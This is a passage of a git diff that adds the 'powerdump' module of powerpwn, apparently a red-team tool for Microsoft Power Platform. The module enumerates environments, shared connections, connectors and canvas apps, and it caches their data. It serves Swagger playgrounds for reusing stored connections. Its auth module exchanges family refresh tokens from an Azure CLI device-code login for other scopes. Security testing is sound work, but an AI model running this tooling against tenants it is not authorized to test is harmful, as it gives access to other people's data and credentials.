(None, ""): + if (account := values.get("account")) is not None: + if account.count("@") == 1: + # populate tenant with email domain + tenant = account.split("@")[-1] + + return tenant diff --git a/src/powerpwn/powerdump/collect/models/principal_entity.py b/src/powerpwn/powerdump/collect/models/principal_entity.py new file mode 100644 index 0000000..3cc30e0 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/principal_entity.py @@ -0,0 +1,13 @@ +from typing import Optional + +from pydantic import EmailStr, Field + +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase + + +class Principal(ResourceEntityBase): + principal_id: str = Field(..., title="Connection ID") + type: str = Field(..., title="Principal type") + tenant_id: str = Field(..., title="AAD tenant ID") + email: Optional[EmailStr] = Field(None, title="Email address") + upn: Optional[EmailStr] = Field(None, title="User principal name") diff --git a/src/powerpwn/powerdump/collect/models/resource_entity_base.py b/src/powerpwn/powerdump/collect/models/resource_entity_base.py new file mode 100644 index 0000000..be38634 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/resource_entity_base.py @@ -0,0 +1,11 @@ +from typing import Any, Dict, Optional + +from powerpwn.powerdump.collect.models.base_entity import BaseEntity +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType + + +class ResourceEntityBase(BaseEntity): + entity_type: ResourceType + display_name: Optional[str] = None + entity_id: str + raw_json: Dict[str, Any] diff --git a/src/powerpwn/powerdump/collect/resources_collectors/__init__.py b/src/powerpwn/powerdump/collect/resources_collectors/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/resources_collectors/_api.py b/src/powerpwn/powerdump/collect/resources_collectors/_api.py new file mode 100644 index 0000000..19e37ca --- /dev/null +++ b/src/powerpwn/powerdump/collect/resources_collectors/_api.py @@ -0,0 +1,82 @@ +from typing import Any, Dict, Generator, List, Optional + +import requests + + +def list_connectors(session: requests.Session, environment_id: str) -> Generator[Dict[str, Any], None, None]: + yield from __paginate( + session, + "https://api.powerapps.com/providers/Microsoft.PowerApps/apis", + {"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"}, + f"get_connectors(environment_id={environment_id})", + ) + + +def get_connector(session: requests.Session, environment_id: str, connector_id: str): + resp = session.get( + url=f"https://api.powerapps.com/providers/Microsoft.PowerApps/apis/{connector_id}", + params={"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"}, + ) + if resp.status_code != 200: + raise RuntimeError( + f"Got status code {resp.status_code} for get_connector(environment_id={environment_id}, connector_name={connector_id}): {str(resp.content)}." + ) + return resp.json() + + +def list_connections(session: requests.Session, environment_id: str) -> Generator[Dict[str, Any], None, None]: + yield from __paginate( + session, + "https://api.powerapps.com/providers/Microsoft.PowerApps/connections", + {"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"}, + f"list_connections(environment_id={environment_id})", + ) + + +def list_canvas_apps(session: requests.Session, environment_id: str) -> Generator[Dict[str, Any], None, None]: + yield from __paginate( + session, + "https://api.powerapps.com/providers/Microsoft.PowerApps/apps", + {"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"}, + f"list_canvas_apps(environment_id={environment_id})", + ) + + +def list_canvas_app_rbac(session: requests.Session, app_id: str, environment_id: str) -> Generator[Dict[str, Any], None, None]: + yield from __paginate( + session, + f"https://api.powerapps.com/providers/Microsoft.PowerApps/apps/{app_id}/permissions", + {"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"}, + f"list_canvas_app_rbac(environment_id={environment_id})", + ) + + +def list_environments(session: requests.Session) -> List[str]: + resp = session.get(url="https://api.powerapps.com/providers/Microsoft.PowerApps/environments", params={"api-version": "2016-11-01"}) + if resp.status_code != 200: + raise RuntimeError(f"Got status code {resp.status_code} for list_environments: {str(resp.content)}.") + + environment_ids = [environment_obj["name"] for environment_obj in resp.json()["value"]] + return environment_ids + + +def __paginate( + session: requests.Session, url: str, params: Dict[str, str], endpoint: str, next_link: Optional[str] = None +) -> Generator[Dict[str, Any], None, None]: + params_to_query = params + url_to_query = url + + if next_link: + params_to_query = {} + url_to_query = next_link + + resp = session.get(url=url_to_query, params=params_to_query) + if resp.status_code != 200: + raise RuntimeError(f"Got status code {resp.status_code} for {endpoint}: {str(resp.content)}.") + + res = resp.json() + + yield from res["value"] + + if "nextLink" in res: + yield from __paginate(session, url, params, endpoint, res["nextLink"]) diff --git a/src/powerpwn/powerdump/collect/resources_collectors/canvas_apps_collector.py b/src/powerpwn/powerdump/collect/resources_collectors/canvas_apps_collector.py new file mode 100644 index 0000000..af8e3b2 --- /dev/null +++ b/src/powerpwn/powerdump/collect/resources_collectors/canvas_apps_collector.py @@ -0,0 +1,88 @@ +import logging +from typing import Generator + +import requests + +from powerpwn.const import LOGGER_NAME +from powerpwn.powerdump.collect.models.canvas_app_entity import CanvasApp +from powerpwn.powerdump.collect.models.principal_entity import Principal +from powerpwn.powerdump.collect.resources_collectors._api import list_canvas_app_rbac, list_canvas_apps +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType +from powerpwn.powerdump.collect.resources_collectors.iresource_collector import IResourceCollector + +logger = logging.getLogger(LOGGER_NAME) + + +class CanvasAppsCollector(IResourceCollector): + def collect(self, session: requests.Session, environment_id: str) -> Generator[CanvasApp, None, None]: + total_canvas_apps = 0 + total_widely_shared_canvas_apps = 0 + for canvas_app in list_canvas_apps(session, environment_id): + total_canvas_apps += 1 + rbacs = list(list_canvas_app_rbac(session, canvas_app["name"], environment_id)) + if any(rbac.get("properties", {}).get("principal", {}).get("type", "NOT_TENANT") == "Tenant" for rbac in rbacs): + total_widely_shared_canvas_apps += 1 + principals = [] + for rbac in rbacs: + if rbac["properties"]["principal"]["type"] == "Tenant": + principals.append( + Principal( + entity_type=ResourceType.principal, + entity_id=rbac["properties"]["principal"].get("tenantId"), + principal_id=rbac["properties"]["principal"].get("tenantId"), + type=rbac["properties"]["principal"].get("type"), + tenant_id=rbac["properties"]["principal"].get("tenantId"), + raw_json=rbac, + display_name=rbac["properties"]["principal"].get("tenantId"), + ) + ) + else: + principals.append( + Principal( + entity_type=ResourceType.principal, + entity_id=rbac["properties"]["principal"].get("id"), + principal_id=rbac["properties"]["principal"].get("id"), + type=rbac["properties"]["principal"].get("type"), + tenant_id=rbac["properties"]["principal"].get("tenantId", "N/A"), + display_name=rbac["properties"]["principal"].get("displayName"), + email=rbac["properties"]["principal"].get("email"), + upn=rbac["properties"]["principal"].get("email"), + raw_json=rbac, + ) + ) + + created_by = Principal( + entity_type=ResourceType.principal, + entity_id=canvas_app["properties"]["createdBy"].get("id"), + principal_id=canvas_app["properties"]["createdBy"].get("id"), + type=canvas_app["properties"]["createdBy"].get("type"), + tenant_id=canvas_app["properties"]["createdBy"].get("tenantId", "N/A"), + display_name=canvas_app["properties"]["createdBy"].get("displayName"), + email=canvas_app["properties"]["createdBy"].get("email"), + upn=canvas_app["properties"]["createdBy"].get("userPrincipalName"), + raw_json=canvas_app["properties"]["createdBy"], + ) + + run_url = canvas_app["properties"]["appPlayUri"] + version = canvas_app["properties"]["appVersion"] + environment_id = canvas_app["properties"]["environment"]["name"].replace("default", "Default") + + yield CanvasApp( + raw_json=canvas_app, + display_name=canvas_app["properties"]["displayName"], + created_by=created_by, + created_at=canvas_app["properties"]["createdTime"], + last_modified_at=canvas_app["properties"]["lastModifiedTime"], + run_url=run_url, + version=version, + permissions=principals, + entity_id=canvas_app["name"], + environment_id=environment_id, + entity_type=ResourceType.canvas_app, + ) + logger.info( + f"Found {total_widely_shared_canvas_apps} widely shared canvas apps out of {total_canvas_apps} canvas apps in environment {environment_id}" + ) + + def resource_type(self) -> ResourceType: + return ResourceType.canvas_app diff --git a/src/powerpwn/powerdump/collect/resources_collectors/connections_collector.py b/src/powerpwn/powerdump/collect/resources_collectors/connections_collector.py new file mode 100644 index 0000000..0b685b8 --- /dev/null +++ b/src/powerpwn/powerdump/collect/resources_collectors/connections_collector.py @@ -0,0 +1,85 @@ +import logging +from typing import Dict, Generator, List + +import requests + +from powerpwn.const import LOGGER_NAME +from powerpwn.powerdump.collect.models.connection_entity import Connection +from powerpwn.powerdump.collect.models.principal_entity import Principal +from powerpwn.powerdump.collect.resources_collectors._api import list_connections +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType +from powerpwn.powerdump.collect.resources_collectors.iresource_collector import IResourceCollector + +logger = logging.getLogger(LOGGER_NAME) + + +class ConnectionsCollector(IResourceCollector): + def __init__(self, connector_id_to_connection_ids: Dict[str, List[str]]) -> None: + self.__connector_id_to_connection_ids = connector_id_to_connection_ids + + def collect(self, session: requests.Session, environment_id: str) -> Generator[Connection, None, None]: + total_connections_count = 0 + active_shareable_connections_count = 0 + raw_connections = list_connections(session, environment_id=environment_id) + + for raw_connection in raw_connections: + total_connections_count += 1 + if raw_connection["properties"]["apiId"] != "/providers/Microsoft.PowerApps/apis/shared_logicflows" and ( + raw_connection["properties"]["statuses"][0]["status"] != "Connected" + ): + # ignore non-active or non shareable connections, other than Logic Flows + continue + + active_shareable_connections_count += 1 + principal = Principal( + entity_type=ResourceType.principal, + entity_id=raw_connection["properties"]["createdBy"].get("id"), + principal_id=raw_connection["properties"]["createdBy"].get("id"), + type=raw_connection["properties"]["createdBy"].get("type"), + tenant_id=raw_connection["properties"]["createdBy"].get("tenantId", "N/A"), + display_name=raw_connection["properties"]["createdBy"].get("displayName"), + email=raw_connection["properties"]["createdBy"].get("email"), + upn=raw_connection["properties"]["createdBy"].get("userPrincipalName"), + raw_json=raw_connection["properties"]["createdBy"], + ) + + connection_props = { + "accountName": raw_connection["properties"].get("accountName"), + **raw_connection["properties"].get("connectionParameters", {}), + **raw_connection["properties"].get("connectionParametersSet", {}), + } + + connection = Connection( + entity_type=ResourceType.connection, + entity_id=raw_connection["name"], + connection_id=raw_connection["name"], + display_name=raw_connection["properties"]["displayName"], + is_valid=all([status_obj["status"] == "Connected" for status_obj in raw_connection["properties"]["statuses"]]), + connector_id=raw_connection["properties"]["apiId"].replace("/providers/Microsoft.PowerApps/apis/", ""), + api_id=raw_connection["properties"]["apiId"], + icon_uri=raw_connection["properties"]["iconUri"], + environment_id=raw_connection["properties"]["environment"]["id"] + .replace("/providers/Microsoft.PowerApps/environments/", "") + .replace("default", "Default"), + environment_name=raw_connection["properties"]["environment"]["name"], + created_at=raw_connection["properties"]["createdTime"], + last_modified_at=raw_connection["properties"]["lastModifiedTime"], + expiration_time=raw_connection["properties"].get("expirationTime"), + created_by=principal, + connection_parameters=connection_props, + test_uri=raw_connection["properties"].get("testLinks", [{}])[0].get("requestUri"), + shareable=raw_connection["properties"]["allowSharing"], + raw_json=raw_connection, + ) + + self.__connector_id_to_connection_ids[connection.connector_id] = self.__connector_id_to_connection_ids.get( + connection.connector_id, [] + ) + [connection.connection_id] + + yield connection + logger.info( + f"Found {active_shareable_connections_count} active shareable connections out of {total_connections_count} connections in environment {environment_id}" + ) + + def resource_type(self) -> ResourceType: + return ResourceType.connection diff --git a/src/powerpwn/powerdump/collect/resources_collectors/connectors_collector.py b/src/powerpwn/powerdump/collect/resources_collectors/connectors_collector.py new file mode 100644 index 0000000..7b38a00 --- /dev/null +++ b/src/powerpwn/powerdump/collect/resources_collectors/connectors_collector.py @@ -0,0 +1,62 @@ +import logging +from typing import Dict, Generator, List + +import requests + +from powerpwn.const import LOGGER_NAME +from powerpwn.powerdump.collect.models.connector_entity import Connector +from powerpwn.powerdump.collect.resources_collectors._api import get_connector +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType +from powerpwn.powerdump.collect.resources_collectors.iresource_collector import IResourceCollector +from powerpwn.powerdump.utils.const import SPEC_JWT_NAME + +logger = logging.getLogger(LOGGER_NAME) + + +class ConnectorsCollector(IResourceCollector): + def __init__(self, connector_id_to_connection_ids: Dict[str, List[str]]) -> None: + self.__connector_id_to_connection_ids = connector_id_to_connection_ids + + def collect(self, session: requests.Session, environment_id: str) -> Generator[Connector, None, None]: + for connector_id in self.__connector_id_to_connection_ids: + logger.info(f"Fetching OpenAPI spec for connector {connector_id}.") + + try: + connector = get_connector(session, environment_id=environment_id, connector_id=connector_id) + except RuntimeError as e: + if "403" in str(e): + logger.warning(f"User doesn't have access to custom connector spec for connector_id={connector_id}. Skipping spec.") + continue + raise e + + swagger = connector["properties"]["swagger"] + + swagger["securityDefinitions"] = swagger.get("securityDefinitions", {}) + swagger["securityDefinitions"][SPEC_JWT_NAME] = { + "name": "Authorization", + "in": "header", + "type": "apiKey", + "description": "JWT Authorization header", + } + + swagger["security"] = swagger.get("security", []) + swagger["security"].append({"ApiHubBearerAuth": []}) + + spec = Connector( + api_name=connector_id, + display_name=connector_id, + environment_id=environment_id, + created_at=connector["properties"]["createdTime"], + last_modified_at=connector["properties"]["changedTime"], + created_by=connector["properties"]["publisher"], + version=connector["properties"]["swagger"]["info"]["version"], + swagger=swagger, + entity_id=connector_id, + entity_type=ResourceType.connector, + raw_json=connector, + ) + + yield spec + + def resource_type(self) -> ResourceType: + return ResourceType.connector diff --git a/src/powerpwn/powerdump/collect/resources_collectors/enums/__init__.py b/src/powerpwn/powerdump/collect/resources_collectors/enums/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/resources_collectors/enums/resource_type.py b/src/powerpwn/powerdump/collect/resources_collectors/enums/resource_type.py new file mode 100644 index 0000000..d32d00e --- /dev/null +++ b/src/powerpwn/powerdump/collect/resources_collectors/enums/resource_type.py @@ -0,0 +1,10 @@ +from enum import auto + +from powerpwn.enums.str_enum import StrEnum + + +class ResourceType(StrEnum): + connection = auto() + connector = auto() + canvas_app = auto() + principal = auto() diff --git a/src/powerpwn/powerdump/collect/resources_collectors/iresource_collector.py b/src/powerpwn/powerdump/collect/resources_collectors/iresource_collector.py new file mode 100644 index 0000000..47833dd --- /dev/null +++ b/src/powerpwn/powerdump/collect/resources_collectors/iresource_collector.py @@ -0,0 +1,25 @@ +from abc import ABC, abstractmethod +from typing import Generator + +import requests + +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType + + +class IResourceCollector(ABC): + @abstractmethod + def collect(self, session: requests.Session, env_id: str) -> Generator[ResourceEntityBase, None, None]: + """ + Collect resources + + Args: + session (requests.Session): authenticated session + env_id (str): environment id + + """ + ... + + @abstractmethod + def resource_type(self) -> ResourceType: + ... diff --git a/src/powerpwn/powerdump/collect/resources_collectors/resources_collector.py b/src/powerpwn/powerdump/collect/resources_collectors/resources_collector.py new file mode 100644 index 0000000..c8bd490 --- /dev/null +++ b/src/powerpwn/powerdump/collect/resources_collectors/resources_collector.py @@ -0,0 +1,54 @@ +import logging +import os.path +from typing import Dict, Generator, List + +from powerpwn.const import LOGGER_NAME +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase +from powerpwn.powerdump.collect.resources_collectors._api import list_environments +from powerpwn.powerdump.collect.resources_collectors.canvas_apps_collector import CanvasAppsCollector +from powerpwn.powerdump.collect.resources_collectors.connections_collector import ConnectionsCollector +from powerpwn.powerdump.collect.resources_collectors.connectors_collector import ConnectorsCollector +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType +from powerpwn.powerdump.utils.const import DATA_MODEL_FILE_EXTENSION +from powerpwn.powerdump.utils.path_utils import env_entity_type_path +from powerpwn.powerdump.utils.requests_wrapper import init_session + +logger = logging.getLogger(LOGGER_NAME) + + +class ResourcesCollector: + """ + A Class to collect resources and cache them in provided cache path + """ + + def __init__(self, cache_path: str, token: str) -> None: + self.__cache_path = cache_path + self.__session = init_session(token=token) + self.__collectors = [CanvasAppsCollector, ConnectionsCollector, ConnectorsCollector] + + def collect_and_cache(self) -> None: + """ + Collect resources and store them in cache + + Args: + cache_path (str): cache path to store resources + """ + environment_ids = list_environments(self.__session) + logger.info(f"Found {len(environment_ids)} environments.") + + for env_id in environment_ids: + connector_id_to_connection_ids: Dict[str, List[str]] = dict() + for collector in self.__collectors: + if collector in (ConnectionsCollector, ConnectorsCollector): + collector_instance = collector(connector_id_to_connection_ids) + else: + collector_instance = collector() + self._cache_entities(collector_instance.collect(self.__session, env_id), collector_instance.resource_type(), env_id) + + def _cache_entities(self, entities: Generator[ResourceEntityBase, None, None], entity_type: ResourceType, env_id: str) -> None: + dir_name = env_entity_type_path(env_id, entity_type, self.__cache_path) + os.makedirs(dir_name, exist_ok=True) + for entity in entities: + file_path = os.path.join(dir_name, entity.entity_id + DATA_MODEL_FILE_EXTENSION) + with open(file_path, "w") as fp: + fp.write(entity.json()) diff --git a/src/powerpwn/powerdump/gui/__init__.py b/src/powerpwn/powerdump/gui/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/gui/assets/logo.png b/src/powerpwn/powerdump/gui/assets/logo.png new file mode 100644 index 0000000..0e6bbe0 Binary files /dev/null and b/src/powerpwn/powerdump/gui/assets/logo.png differ diff --git a/src/powerpwn/powerdump/gui/gui.py b/src/powerpwn/powerdump/gui/gui.py new file mode 100644 index 0000000..176eeaf --- /dev/null +++ b/src/powerpwn/powerdump/gui/gui.py @@ -0,0 +1,45 @@ +import logging +import os +import pathlib +import subprocess # nosec + +from flask import Flask + +from powerpwn.const import LOGGER_NAME +from powerpwn.powerdump.gui.prep import ( + flt_connection_table_wrapper, + flt_resource_wrapper, + full_canvasapps_table_wrapper, + full_connection_table_wrapper, + full_connectors_table_wrapper, + full_resources_table_wrapper, + register_specs, +) + + +class Gui: + def run(self, cache_path: str): + # run file browser + subprocess.Popen(["browsepy", "0.0.0.0", "8080", "--directory", cache_path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) # nosec + + # run resources flask app + app = Flask(__name__, template_folder=self.__get_template_full_path()) + register_specs(app=app, cache_path=cache_path) + app.route("/")(full_resources_table_wrapper(cache_path=cache_path)) + app.route("/connection")(full_connection_table_wrapper(cache_path=cache_path)) + app.route("/canvas_app/")(full_canvasapps_table_wrapper(cache_path)) + app.route("/connector/")(full_connectors_table_wrapper(cache_path)) + app.route("//")(flt_connection_table_wrapper(cache_path=cache_path)) + app.route("///")(flt_resource_wrapper(cache_path=cache_path)) + + logger = logging.getLogger(LOGGER_NAME) + logger.info("Application is running on http://127.0.0.1:5000") + + # turn off server logs + log = logging.getLogger("werkzeug") + log.setLevel(logging.ERROR) + + app.run() + + def __get_template_full_path(self) -> str: + return os.path.join(pathlib.Path(__file__).parent.resolve(), "templates") diff --git a/src/powerpwn/powerdump/gui/prep.py b/src/powerpwn/powerdump/gui/prep.py new file mode 100644 index 0000000..882a399 --- /dev/null +++ b/src/powerpwn/powerdump/gui/prep.py @@ -0,0 +1,111 @@ +import json +import os +import pathlib +from typing import Optional + +from flask import Flask, render_template +from swagger_ui import flask_api_doc + +from powerpwn.const import TOOL_NAME +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType +from powerpwn.powerdump.utils.model_loaders import ( + get_canvasapp, + get_connection, + get_connector, + load_canvasapps, + load_connections, + load_connectors, + load_resources, + map_connector_id_and_env_id_to_connection_ids, +) + + +def register_specs(app: Flask, cache_path: str): + connections = load_connections(cache_path=cache_path) + connector_id_and_env_id_to_connection_ids = map_connector_id_and_env_id_to_connection_ids(connections=connections) + + for spec in load_connectors(cache_path=cache_path): + # clean connectionId from parameters + for _, path_obj in spec.swagger.get("paths", {}).items(): + for _, path_method_obj in path_obj.items(): + path_method_obj["parameters"] = [params for params in path_method_obj.get("parameters", []) if params.get("name") != "connectionId"] + + # generate Swagger UI for each connection + for connection_id in connector_id_and_env_id_to_connection_ids[(spec.api_name, spec.environment_id)]: + title = f"{spec.swagger['info']['title']} / {connection_id}" + base_path = spec.swagger["basePath"].replace("/apim/", "") + + flask_api_doc( + app, + config=spec.processed_swagger(connection_id=connection_id, make_concrete=False), + url_prefix=f"/api/shared_{base_path}/{connection_id}", + title=title, + ) + + +def full_resources_table_wrapper(cache_path: str): + def full_resources_table(): + resources = list(load_resources(cache_path=cache_path)) + + return render_template("resources_table.html", title=TOOL_NAME, resources=resources) + + return full_resources_table + + +def full_connection_table_wrapper(cache_path: str): + def full_connection_table(): + connections = list(load_connections(cache_path=cache_path)) + + return render_template("connections_table.html", title=f"{TOOL_NAME} - Connections", resources=connections) + + return full_connection_table + + +def flt_connection_table_wrapper(cache_path: str): + def flt_connection_table(connector_id: str): + connections = [conn for conn in load_connections(cache_path=cache_path) if conn.connector_id == connector_id] + + return render_template("connections_table.html", title=f"{TOOL_NAME} - {connector_id}", resources=connections) + + return flt_connection_table + + +def full_canvasapps_table_wrapper(cache_path: str): + def full_canvasapp_table(): + apps = list(load_canvasapps(cache_path=cache_path)) + + return render_template("canvasapps_table.html", title=f"{TOOL_NAME} - Canvas Apps", resources=apps) + + return full_canvasapp_table + + +def full_connectors_table_wrapper(cache_path: str): + def full_connector_table(): + connectors = list(load_connectors(cache_path=cache_path)) + + return render_template("connectors_table.html", title=f"{TOOL_NAME} - Connectors", resources=connectors) + + return full_connector_table + + +def flt_resource_wrapper(cache_path: str): + def get_resource_page(resource_type: ResourceType, env_id: str, resource_id: str): + resource: Optional[ResourceEntityBase] = None + if resource_type == ResourceType.canvas_app: + resource = get_canvasapp(cache_path, env_id, resource_id) + elif resource_type == ResourceType.connection: + resource = get_connection(cache_path, env_id, resource_id) + elif resource_type == ResourceType.connector: + resource = get_connector(cache_path, env_id, resource_id) + + if resource: + return render_template( + "json_object.html", title=f"{TOOL_NAME} - {resource_type} {resource_id}", json_object=json.dumps(resource.raw_json) + ) + + return get_resource_page + + +def __get_template_full_path(template_name: str) -> str: + return os.path.join(pathlib.Path(__file__).parent.resolve(), "templates", template_name) diff --git a/src/powerpwn/powerdump/gui/templates/__init__.py b/src/powerpwn/powerdump/gui/templates/__init__.py new file mode 100644 index 0000000..0cf945a --- /dev/null +++ b/src/powerpwn/powerdump/gui/templates/__init__.py @@ -0,0 +1,3 @@ +""" +Borrowing from https://github.com/miguelgrinberg/flask-tables +""" diff --git a/src/powerpwn/powerdump/gui/templates/base.html b/src/powerpwn/powerdump/gui/templates/base.html new file mode 100644 index 0000000..f8d8cbc --- /dev/null +++ b/src/powerpwn/powerdump/gui/templates/base.html @@ -0,0 +1,31 @@ + + + + {{ title }} + + + + +
+

{{ title }}

+
+
+ +
+ {% block content %}{% endblock %} +
+
+
+ + + + {% block scripts %}{% endblock %} + + \ No newline at end of file diff --git a/src/powerpwn/powerdump/gui/templates/canvasapps_table.html b/src/powerpwn/powerdump/gui/templates/canvasapps_table.html new file mode 100644 index 0000000..b073fea --- /dev/null +++ b/src/powerpwn/powerdump/gui/templates/canvasapps_table.html @@ -0,0 +1,40 @@ +{% extends "base.html" %} + +{% block content %} + + + + + + + + + + + + + {% for canvasapp in resources %} + + + + + + + + + + + {% endfor %} + +
Display nameEnvironment VersionCreated byCreated at Last modified at
{{ canvasapp.display_name }}{{ canvasapp.environment_id }}{{ canvasapp.version }}{{ canvasapp.created_by.email }}{{ canvasapp.created_at }}{{ canvasapp.last_modified_at }}Run Raw
+{% endblock %} + +{% block scripts %} + +{% endblock %} \ No newline at end of file diff --git a/src/powerpwn/powerdump/gui/templates/connections_table.html b/src/powerpwn/powerdump/gui/templates/connections_table.html new file mode 100644 index 0000000..5612d37 --- /dev/null +++ b/src/powerpwn/powerdump/gui/templates/connections_table.html @@ -0,0 +1,47 @@ +{% extends "base.html" %} + +{% block content %} + + + + + + + + + + + + + + + + {% for connection in resources %} + + + + + + + + + + + + + + + {% endfor %} + +
ConnectorConnectionEnvironment Is validLast modified atExpires atCreated byShareable
{{ connection.connection_id }}{{ connection.connector_id }}{{ connection.display_name }}{{ connection.environment_id }}{{ connection.is_valid }}{{ connection.last_modified_at }}{{ connection.expiration_time }}{{ connection.created_by.email }}{{ connection.shareable }}PlaygroundRaw Dump
+{% endblock %} + +{% block scripts %} + +{% endblock %} \ No newline at end of file diff --git a/src/powerpwn/powerdump/gui/templates/connectors_table.html b/src/powerpwn/powerdump/gui/templates/connectors_table.html new file mode 100644 index 0000000..32c1655 --- /dev/null +++ b/src/powerpwn/powerdump/gui/templates/connectors_table.html @@ -0,0 +1,37 @@ +{% extends "base.html" %} + +{% block content %} + + + + + + + + + + + + {% for connector in resources %} + + + + + + + + + {% endfor %} + +
Display nameVersionCreated byCreated at Last modified at
{{ connector.display_name }}{{ connector.version }}{{ connector.created_by }}{{ connector.created_at }}{{ connector.last_modified_at }}Raw
+{% endblock %} + +{% block scripts %} + +{% endblock %} \ No newline at end of file diff --git a/src/powerpwn/powerdump/gui/templates/json_object.html b/src/powerpwn/powerdump/gui/templates/json_object.html new file mode 100644 index 0000000..0d7f552 --- /dev/null +++ b/src/powerpwn/powerdump/gui/templates/json_object.html @@ -0,0 +1,13 @@ +{% extends "base.html" %} + +{% block content %} + +

+{% endblock %}
+
+{% block scripts %}
+
+{% endblock %}
diff --git a/src/powerpwn/powerdump/gui/templates/resources_table.html b/src/powerpwn/powerdump/gui/templates/resources_table.html
new file mode 100644
index 0000000..b6f6749
--- /dev/null
+++ b/src/powerpwn/powerdump/gui/templates/resources_table.html
@@ -0,0 +1,41 @@
+{% extends "base.html" %}
+
+{% block content %}
+  
+    
+      
+        
+        
+        
+        
+        
+        
+        
+      
+    
+    
+      {% for resource in resources %}
+        
+          
+          
+          
+          
+          
+          
+          
+          
+        
+      {% endfor %}
+    
+  
Resource NameResource IdResource TypeEnvironmentCreated ByCreated AtLast modified At
{{ resource.display_name }} {{ resource.entity_id }}{{ resource.entity_type }}{{ resource.environment_id }}{{ resource.created_by.email }}{{ resource.created_at }}{{ resource.last_modified_at }}Raw
+{% endblock %} + +{% block scripts %} + +{% endblock %} \ No newline at end of file diff --git a/src/powerpwn/powerdump/utils/__init__.py b/src/powerpwn/powerdump/utils/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/utils/auth.py b/src/powerpwn/powerdump/utils/auth.py new file mode 100644 index 0000000..156add9 --- /dev/null +++ b/src/powerpwn/powerdump/utils/auth.py @@ -0,0 +1,103 @@ +import logging +from typing import Optional + +import msal + +from powerpwn.const import LOGGER_NAME, TOOL_NAME +from powerpwn.powerdump.utils.const import API_HUB_SCOPE, AZURE_CLI_APP_ID, GRAPH_API_SCOPE, POWER_APPS_SCOPE +from powerpwn.powerdump.utils.token_cache import TOKEN_CACHE_PATH, TokenCache, put_token, put_tokens, try_fetch_token + +logger = logging.getLogger(LOGGER_NAME) + +AZURE_CLI_REFRESH_TOKEN = "cli_refresh_token" # nosec +POWERAPPS_ACCESS_TOKEN = "powerapps_access_token" # nosec +APIHUB_ACCESS_TOKEN = "apihub_access_token" # nosec + +SCOPE_TO_TOKEN_CACHE_TYPE = {API_HUB_SCOPE: APIHUB_ACCESS_TOKEN, POWER_APPS_SCOPE: POWERAPPS_ACCESS_TOKEN} + + +def acquire_token(scope: str, tenant: Optional[str] = None) -> str: + """ + Leverage family refresh tokens to acquire a Graph API refresh token and exchange it for other required scopes + https://github.com/secureworks/family-of-client-ids-research + :param scope: token scope + :return: Bearer token + """ + logger.info(f"Acquiring token with scope={scope}.") + + azure_cli_client = __get_msal_cli_application(tenant) + + # Acquire Graph API refresh token + device_flow = azure_cli_client.initiate_device_flow(scopes=[GRAPH_API_SCOPE]) + print(device_flow["message"]) + azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow(device_flow) # blocking + + azure_cli_app_refresh_token = azure_cli_bearer_tokens_for_graph_api.get("refresh_token") + + azure_cli_bearer_tokens_for_scope = ( + # Same client as original authorization + azure_cli_client.acquire_token_by_refresh_token( + azure_cli_app_refresh_token, + # But different scopes than original authorization + scopes=[scope], + ) + ) + + bearer = azure_cli_bearer_tokens_for_scope.get("token_type") + " " + azure_cli_bearer_tokens_for_scope.get("access_token") + logger.info(f"Access token for {scope} acquired successfully") + + # cache refresh token for cli to use in further FOCI authentication + # cache access token for required scope + tokens_to_cache = [ + TokenCache(token_key=AZURE_CLI_REFRESH_TOKEN, token_val=azure_cli_app_refresh_token), + TokenCache(SCOPE_TO_TOKEN_CACHE_TYPE[scope], bearer), + ] + put_tokens(tokens_to_cache) + logger.info(f"Token is cached in {TOKEN_CACHE_PATH}") + + return bearer + + +def acquire_token_from_cached_refresh_token(scope: str, tenant: Optional[str] = None) -> str: + """ + Leverage family refresh tokens to acquire a Graph API refresh token and exchange it for other required scopes + https://github.com/secureworks/family-of-client-ids-research + :param scope: token scope + :return: Bearer token + """ + logger.info(f"Acquiring token with scope={scope} from cached refresh token.") + + cached_refresh_token = try_fetch_token(AZURE_CLI_REFRESH_TOKEN) + + if not cached_refresh_token: + logger.info("Failed to acquire with refresh token. Fallback to device-flow") + return acquire_token(scope, tenant) + + azure_cli_client = __get_msal_cli_application(tenant) + + azure_cli_bearer_tokens_for_scope = ( + # Same client as original authorization + azure_cli_client.acquire_token_by_refresh_token( + cached_refresh_token, + # But different scopes than original authorization + scopes=[scope], + ) + ) + + bearer = azure_cli_bearer_tokens_for_scope.get("token_type") + " " + azure_cli_bearer_tokens_for_scope.get("access_token") + logger.info(f"Token for {scope} acquired from refresh token successfully.") + + # cache access token for required scope + tokens_to_cache = TokenCache(SCOPE_TO_TOKEN_CACHE_TYPE[scope], bearer) + put_token(tokens_to_cache) + logger.info(f"Token is cached in {TOKEN_CACHE_PATH}") + + return bearer + + +def __get_msal_cli_application(tenant: Optional[str] = None) -> msal.PublicClientApplication: + if tenant: + authority = authority = f"https://login.microsoftonline.com/{tenant}" + return msal.PublicClientApplication(AZURE_CLI_APP_ID, authority=authority, app_name=TOOL_NAME) + else: + return 